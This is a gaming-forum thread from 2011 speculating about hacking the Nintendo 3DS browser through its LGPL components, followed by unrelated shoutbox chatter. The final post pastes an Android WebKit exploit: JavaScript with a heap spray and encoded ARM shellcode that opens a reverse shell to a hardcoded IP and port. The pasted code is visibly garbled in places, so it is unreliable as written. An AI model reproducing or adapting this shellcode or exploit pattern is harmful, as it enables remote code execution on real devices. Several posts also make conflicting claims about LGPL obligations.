Hacking Internet Browser built on open source software.

LinkReincarnate

Member
Newcomer
Joined
Jun 10, 2011
Messages
10
Trophies
0
XP
3
Country
United States
So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but i can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so i may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
 

ccfreak2k

Well-Known Member
Newcomer
Joined
May 3, 2011
Messages
53
Trophies
0
XP
23
Country
United States
It's almost certainly for one or more libraries, like libcurl. These kinds of libraries have been around a long time and have a very wide deployment, thus making them very well-tested.

That is to say, the source code would be in one of the included libraries and not the actual browser itself.
 

Spoom

Member
Newcomer
Joined
Mar 30, 2009
Messages
8
Trophies
0
XP
98
Country
Canada
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
 

Dash_2

Hello I'm Dash!
Member
Joined
Jun 6, 2011
Messages
132
Trophies
0
Age
32
Location
Melbourne, Florida!
Website
www.gofundme.com
XP
142
Country
Spoom said:
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.


yeah they ditched opera...

they use the same browser as psp and ps3..
 

Toad King

Well-Known Member
Member
Joined
Aug 19, 2009
Messages
374
Trophies
0
XP
545
Country
United States
Harakiri23 said:
The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
 

pachura

Well-Known Member
Member
Joined
Dec 9, 2006
Messages
566
Trophies
0
XP
240
Country
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
 

ccfreak2k

Well-Known Member
Newcomer
Joined
May 3, 2011
Messages
53
Trophies
0
XP
23
Country
United States
pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
Doubtful. The cost for adding that kind of thing to the hardware would be greater than the gain from thwarting such attacks. It's possible that the software may be hardened (here's some examples), but ARM, being embedded, isn't really security-oriented. I'm putting my money on exploits being given only specific contextual access to the hardware.
 

BlazerRazor

Well-Known Member
Member
Joined
Nov 21, 2005
Messages
136
Trophies
0
XP
156
Country
LinkReincarnate said:
So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but i can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so i may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
That's a completely wrong statement. Libraries licensed under LGPL does NOT require other thirds parties to hand over their code.
That is why LGPL was made, to make developers able to use libraries, linking, without needing to share their code.

Source; http://en.wikipedia.org/wiki/GNU_General_P...d_derived_works http://www.gnu.org/copyleft/lesser.html

Also, your talk about weaknesses in code is also kinda invalid. The chance of exploitable holes is much slimmer when you consider it is released under LGPL -- people can freely view the code and identify holes. Also, it would be wise of Nintendo to run applications like the browser in some sort of "sandbox" environment, to make sure you can't exploit future holes.
 

Harakiri23

Active Member
Newcomer
Joined
Jun 28, 2007
Messages
36
Trophies
0
XP
200
Country
United States
Toad King said:
Harakiri23 said:
The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
 

LinkReincarnate

Member
Newcomer
Joined
Jun 10, 2011
Messages
10
Trophies
0
XP
3
Country
United States
Harakiri23 said:
Toad King said:
Harakiri23 said:
The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
For what it's worth Nintendo thinks that they have a requirement to host the code because they are. Whether that is really the case or whether someone at Nintendo f'ed up is irrelevant.
 

LinkReincarnate

Member
Newcomer
Joined
Jun 10, 2011
Messages
10
Trophies
0
XP
3
Country
United States
pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
It's a custom job that uses very large chunks of arm 9. Arm 9 is in all kinds of android phones and tablets. Any android exploits for webkit?
Yup They even allow remote code execution. Will that work on the 3ds? Probably not but it does give a general idea of where vulnerabilities may lie and the methodlogies that should be used. BTW that exploit uses javascript. Here is the code for those who are interested.




function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };

var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

do
{
scode += scode;
scode2 += scode2;

} while (scode.length250){
// alert("freeze");
nodes[0].textContent}

}

}, 0);
}



[/p]
 

Site & Scene News

General chit-chat
Help Users
  • kenenthk @ kenenthk:
    In 20 years we'll probably have micro sd cards implants in our heads
  • DinohScene @ DinohScene:
    microsd?
  • kenenthk @ kenenthk:
    I'd be okay with getting my brain taken out and replaced with one as long as its not intel or apple
  • DinohScene @ DinohScene:
    shiet get on with the time grampa, we're using picoSD now
  • kenenthk @ kenenthk:
    Only the most important humans will have nvme installed in their head
  • _Shimon @ _Shimon:
    oh shit this exists
  • Arras @ Arras:
    wait this is where the shoutbox went?
  • Adran_Marit @ Adran_Marit:
    What are everyone's
    thoughts on gpu prices atm?
  • Arras @ Arras:
    high
  • Adran_Marit @ Adran_Marit:
    lol yes they are high, mate of mine just got a 1080 for $700 AUD
  • Adran_Marit @ Adran_Marit:
    second hand which is nuts as when the 3070 came out here that's how much it was new at the time
  • kenenthk @ kenenthk:
    I
    f you have tech that can decently run games don't buy anything yet wait a year or two
  • Adran_Marit @ Adran_Marit:
    I just got a core build upgrade, minus gpu due to price, will be running my GTX780 until I can afford an upgrade
  • kenenthk @ kenenthk:
    Prices are up because of bots and
    shortages it'll die down with a year or two
  • Adran_Marit @ Adran_Marit:
    Yeah I imagine there will be a short period where prices are low then the next series will come out and low and behold have high prices again
  • kenenthk @ kenenthk:
    Today's games look just fine at 1080 with decent 60fos unless you have disposable income it's not really worth it
  • kenenthk @ kenenthk:
    Probably won't be that long until theirs 4k capable apus around $400
  • PeeJay Bonobo @ PeeJay Bonobo:
    And I'm here stuck with my 3800X (though I need to plan if I want to upgrade to a 5900X) and an RX 5700 (XT BIOS).
  • p1ngpong @ p1ngpong:
    DEAD
  • DinohScene @ DinohScene:
    ALIVE
  • Slluxx @ Slluxx:
    oh wow, chat available from any where, nice
  • AkiraKurusu @ AkiraKurusu:
    Are scalpers still scalping PS5s? If no, might plan on getting one soonish.
  • SG854 @ SG854:
    Glad I got my 3080 at retail price
  • kenenthk @ kenenthk:
    Weird got a reCaptcha check by
    refreshing the page
    kenenthk @ kenenthk: https://amp.cnn.com/cnn/2021/09/24/tech/webcams-workplace-meetings/index.html